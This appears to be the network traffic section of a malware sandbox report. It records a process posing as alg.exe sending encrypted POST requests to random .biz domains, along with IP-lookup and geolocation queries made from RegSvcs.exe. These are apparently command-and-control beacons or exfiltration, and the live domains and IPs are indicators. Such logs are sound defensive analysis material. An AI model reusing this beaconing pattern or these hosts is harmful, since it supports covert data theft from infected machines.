                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Dec 2, 2024 07:56:27.664407015 CET321INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:27 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: fbf0f878860c5b929d327325b0bd51d6
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                13192.168.2.44975018.141.10.107807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:26.990027905 CET346OUTPOST /rq HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: knjghuig.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:26.990071058 CET778OUTData Raw: bf e3 aa 29 e2 0a cd 3d fe 02 00 00 42 67 7c ad 40 bb 60 38 be 6f 2e 43 21 12 02 3d 06 90 e7 c6 81 ac e7 e0 9d 6d d8 3f 9a 1e f7 71 47 b7 8c a1 cf b5 e1 d3 8d 49 50 bd 6a be 03 37 1b 4f 84 23 58 dd 6d 0a d6 40 ef 24 ca 73 cf 7d f9 ae bf 50 6c bc
                                                                                                                                                Data Ascii: )=Bg|@`8o.C!=m?qGIPj7O#Xm@$s}Pl *6s!z8Dbg/nV!9%87m?41o7ReuS&@O4oU{!8]/uJTSranO #8mu~%3D 9ZD$Xs48ISM
                                                                                                                                                Dec 2, 2024 07:56:29.092554092 CET412INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:28 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=5cc76833bfeb0c5f2d8169b837090f00|8.46.123.228|1733122588|1733122588|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                14192.168.2.44975382.112.184.197807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:30.512433052 CET351OUTPOST /vtrrtopft HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:30.512454987 CET778OUTData Raw: e1 f3 7a 9c 42 9c 57 bc fe 02 00 00 8d 44 4b fd 39 95 36 9a 80 ae a5 e3 d1 09 b9 e0 0b 11 e0 c7 c2 cf e5 11 f6 a7 47 78 fa 49 48 78 f3 bd fd ca 22 c5 97 c1 bc 1d 61 f5 21 fa 2f 23 90 1a f8 6e 91 d0 22 27 75 47 df 96 a2 72 b7 c1 6c 84 7c f6 41 54
                                                                                                                                                Data Ascii: zBWDK96GxIHx"a!/#n"'uGrl|ATHn]g3T:/qf\iKU4h!~gsSA g`Xx%xHf|9o+2qwCg;}_L\Lw+4FKsm{1R@+o`kp5a~


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                15192.168.2.44975482.112.184.197807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:52.610747099 CET350OUTPOST /dmksqnbs HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:52.610761881 CET778OUTData Raw: b7 ce 37 62 62 ce 74 31 fe 02 00 00 f9 0b 00 55 79 cf 51 03 bd 09 c5 22 87 ed 47 ba 28 8f b4 1c fa 3d 6c ee 0f de e0 7f bd 89 56 85 26 d8 ef 85 ce 51 3c 7e bb 57 2e 93 28 42 f5 ad bf 6d ca 96 53 f4 fb a3 1d 67 73 58 66 36 c5 4a ca 72 83 46 92 ca
                                                                                                                                                Data Ascii: 7bbt1UyQ"G(=lV&Q<~W.(BmSgsXf6JrF9oGe7^y=K.:TS;o@+Nd-x%>Fy%i@'q:%n._QumKWJ4;+Orrx*5U03


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                16192.168.2.44979082.112.184.197807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:57:16.047380924 CET348OUTPOST /vip HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: vjaxhpbji.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:57:16.047435045 CET778OUTData Raw: 45 9d cc 4b 9a 73 08 98 fe 02 00 00 4e 46 4b eb 03 c9 8b 46 85 1f 11 8e 6c e8 6e db 9f 73 db 99 fc e4 96 35 c4 a2 fc da 85 68 8f 37 54 63 7c 77 b8 d3 05 50 5d 9f 68 af d1 c9 8c a6 cd e0 95 e6 b4 f7 5f 3a 24 48 f0 ca 5a 8a 1c db 1f 16 2d 3b f9 32
                                                                                                                                                Data Ascii: EKsNFKFlns5h7Tc|wP]h_:$HZ-;2h)FQg+qFuw.WR~`cx,rKQ*hADCR?g&wp\2^WB(9S;5:y_$%D$6e5-0x.x<0:c!U


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                17192.168.2.44984082.112.184.197807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:57:38.377584934 CET361OUTPOST /lhocoojsqrafriia HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: vjaxhpbji.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:57:38.377609968 CET778OUTData Raw: 7f f0 c3 c6 7a 93 5e ac fe 02 00 00 5a 33 70 54 9a 8d 69 e5 6b 2b 0d 9f 49 84 ff 41 ff 81 76 73 c2 8e 28 dc b4 e0 e2 f0 f4 09 01 cb c1 3b f9 40 cb 83 af 9c e7 f8 83 d5 99 eb 00 5c b2 b7 9c 6e 94 fd 19 73 89 5c ec f4 9d b7 b8 d8 1f 42 1b 32 58 f9
                                                                                                                                                Data Ascii: z^Z3pTik+IAvs(;@\ns\B2Xy4FdrZ W!6:KSs~CG"oTqI_* 6dzpxfNvl<LO~Lc;\bSrR^9S UO#\z~d5,


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                18192.168.2.44987247.129.31.212807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:57:53.000236988 CET357OUTPOST /fnbbnvvirqhlfx HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: xlfhhhm.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:57:53.000269890 CET778OUTData Raw: 1d 5b 21 84 ad e7 05 7c fe 02 00 00 3d 05 24 ef 2e 77 88 9b de 4f 0c 1d 88 82 00 a5 99 88 b3 49 b8 99 dc 2d 39 6d 82 91 bd e1 3a 64 6c 18 b1 98 59 42 19 c0 47 31 64 eb 67 c6 54 3c 29 3a 31 27 3b 5f e7 b5 5a 98 a4 f8 f9 44 28 86 a6 d5 d6 15 d5 0a
                                                                                                                                                Data Ascii: [!|=$.wOI-9m:dlYBG1dgT<):1';_ZD(5\g%=)s:ij9|\P\(vQ+)`IXs&Hui?D%mod8s+>'bntwA7YG}BQmk5u{`}Pm!WSoEk2
                                                                                                                                                Dec 2, 2024 07:57:55.104959965 CET411INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:57:54 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=95f091603713460660fe7370fab13636|8.46.123.228|1733122674|1733122674|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                19192.168.2.44988113.251.16.150807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:57:55.805135965 CET346OUTPOST /laps HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: ifsaia.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:57:55.805166006 CET778OUTData Raw: 47 49 40 d9 45 4e 7a 8e fe 02 00 00 2c 60 c2 bf f4 db fa 9e 7e c0 9f 7b a4 72 9d 82 c6 2c ed 6f ee 71 95 99 81 48 90 d4 aa 47 74 46 62 73 97 80 e5 7c a1 e6 0e a8 eb d3 0a 2e 6c 96 55 9b db f5 68 39 73 be 6d 07 cc 30 a9 73 64 7a e6 00 bf 4c 56 31
                                                                                                                                                Data Ascii: GI@ENz,`~{r,oqHGtFbs|.lUh9sm0sdzLV1K=+_S.<]"u]f%F[{E'D:`I,f2~\-)\][|2"na(VE"]h:FE%ed2b\tjk0wRa,X
                                                                                                                                                Dec 2, 2024 07:57:57.925995111 CET410INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:57:57 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=c265428cf6f05debdad4fdd4af65cd27|8.46.123.228|1733122677|1733122677|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                20192.168.2.44988744.221.84.105807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:57:58.625430107 CET348OUTPOST /bkq HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: saytjshyf.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:57:58.625452995 CET778OUTData Raw: 72 37 5f 2e dc b5 ef 9f fe 02 00 00 59 dd cc cb 53 56 52 68 b2 dc c2 57 a2 b3 a3 76 9d 92 f6 da b9 3e a2 f2 a6 33 a2 70 2e c5 10 ca 77 01 a1 30 c9 0a 21 c3 42 84 53 97 50 fa 9b 6f 49 fc ee 43 7c 41 7d 41 68 75 47 79 d2 f5 3b 60 5a 51 88 ce cf cb
                                                                                                                                                Data Ascii: r7_.YSVRhWv>3p.w0!BSPoIC|A}AhuGy;`ZQc^c+p\^ \ofe5&+eQ*% #hh5sUY4<,W"^cdLZ2!Yo,FB10n@/;0)2>?ym
                                                                                                                                                Dec 2, 2024 07:57:59.722337008 CET413INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:57:59 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=444c0e4ea70eb8017432d411eb0edae2|8.46.123.228|1733122679|1733122679|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                21192.168.2.44989318.141.10.107807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:58:00.640574932 CET345OUTPOST /kf HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: vcddkls.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:58:00.640599966 CET778OUTData Raw: 71 55 4e a6 47 18 75 1e fe 02 00 00 ee f8 51 2e 72 61 bb dd 3c 87 8b 27 76 49 54 11 e5 88 4e ba c1 d0 c1 78 8f 39 e6 15 99 6c ca ad fb 30 dd aa 9e 6b 41 e6 fa 80 5f 39 46 32 ae 01 fd 7b 26 03 d4 83 67 6c 81 7b 7e 3d 9f d3 46 ab c3 ab 89 e0 5a 8b
                                                                                                                                                Data Ascii: qUNGuQ.ra<'vITNx9l0kA_9F2{&gl{~=FZq&[*Q^2f}K Eeyc>SIT%m*F{is_}F^Z'Wm?^Z91aalZ7zK<UN3q,a^CwcyxNu
                                                                                                                                                Dec 2, 2024 07:58:02.649509907 CET411INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:58:02 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=50e66b7671235bd6e77d7017d3fbef73|8.46.123.228|1733122682|1733122682|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                22192.168.2.449899172.234.222.138807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:58:03.477749109 CET342OUTPOST /a HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: fwiwk.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:58:03.477765083 CET778OUTData Raw: 04 d0 73 e5 31 57 f9 47 fe 02 00 00 da b2 fc a2 f6 54 0e 91 0c 6d 20 85 ef 48 4d 86 30 fb 2d 3f ff 99 d3 2a 1d 7e 87 64 5e 59 48 02 87 c0 a8 88 df 47 62 86 60 82 9e a8 51 a6 e9 be 17 8f b8 64 51 c6 64 e8 16 c6 6e 52 dc 0b 74 b4 ae 75 83 70 38 b0
                                                                                                                                                Data Ascii: s1WGTm HM0-?*~d^YHGb`QdQdnRtup8;g[(vX:7P'mG&b<9&9:l]#mh8^v\v>FR;YcDU85.MW\ AJ~q-ob*;'>H+'
                                                                                                                                                Dec 2, 2024 07:58:04.603831053 CET461INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: openresty
                                                                                                                                                Date: Mon, 02 Dec 2024 06:58:04 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 142
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                Location: http://ww99.fwiwk.biz/a
                                                                                                                                                Cache-Control: no-store, max-age=0
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                23192.168.2.44990272.52.179.174807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:58:05.045425892 CET325OUTGET /a HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Host: ww99.fwiwk.biz
                                                                                                                                                Dec 2, 2024 07:58:06.259377003 CET272INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Date: Mon, 02 Dec 2024 06:58:06 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 0
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: http://ww7.fwiwk.biz/a?usid=26&utid=9204737652
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Access-Control-Allow-Origin: *


                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449736104.21.67.1524437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-02 06:56:16 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-02 06:56:17 UTC869INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FQwYiEjXjN83xKRiL%2FU5KOjstZh1vTVfH08w2It9%2BF2hWQ%2FZF7HaQO%2Bq1Vjhk8hv8bTcne4BHInJGT6QXcUWRZ72b3qSEPToVehCgVTYKnGxgdCfbtJwopHfKfx%2B07aAWmi0ZwIW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8eb96a8b2af8f3bb-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1644&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1776155&cwnd=32&unsent_bytes=0&cid=400d57f9ee2181f3&ts=828&x=0"
                                                                                                                                                2024-12-02 06:56:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449752104.21.67.1524438008C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-02 06:56:29 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-02 06:56:29 UTC876INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:29 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 12
                                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=czBGGItZsKIZizKxQRLn9CY7mLf%2F1OGqENVAWd4WjGXPhIxERBzsHmisBCftOrAMmPtduk0Bk0MGfSma6bEFYQ8iWIliGBZckZJ%2BPYkOAy7OJTFTdPeG%2BvWYseSwjB%2B%2F0AWU9d0w"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8eb96ad69b08335a-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1982&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=232&unsent_bytes=0&cid=fa7755599b8346fb&ts=458&x=0"
                                                                                                                                                2024-12-02 06:56:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
